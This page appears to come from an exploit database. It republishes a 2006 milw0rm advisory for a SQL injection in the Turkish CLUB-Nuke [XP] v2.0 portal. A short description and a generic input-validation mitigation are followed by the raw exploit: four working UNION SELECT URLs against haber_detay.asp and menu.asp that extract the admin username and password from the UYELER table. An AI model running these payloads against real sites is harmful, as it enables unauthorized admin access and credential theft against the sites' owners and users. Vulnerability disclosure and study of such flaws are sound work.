header-logo
Suggest Exploit
vendor:
CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version)
by:
ASIANEAGLE
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version)
Affected Version From: CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version)
Affected Version To: CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version)
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability

A SQL injection vulnerability exists in CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) which allows an attacker to gain access to the admin panel. The attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This request contains a specially crafted SQL query which can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk   : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web    : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=


#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability

#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201

#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201

after login as user;

#Admin Nick    : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201

#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201

#Forever milw0rm ;)

# milw0rm.com [2006-08-08]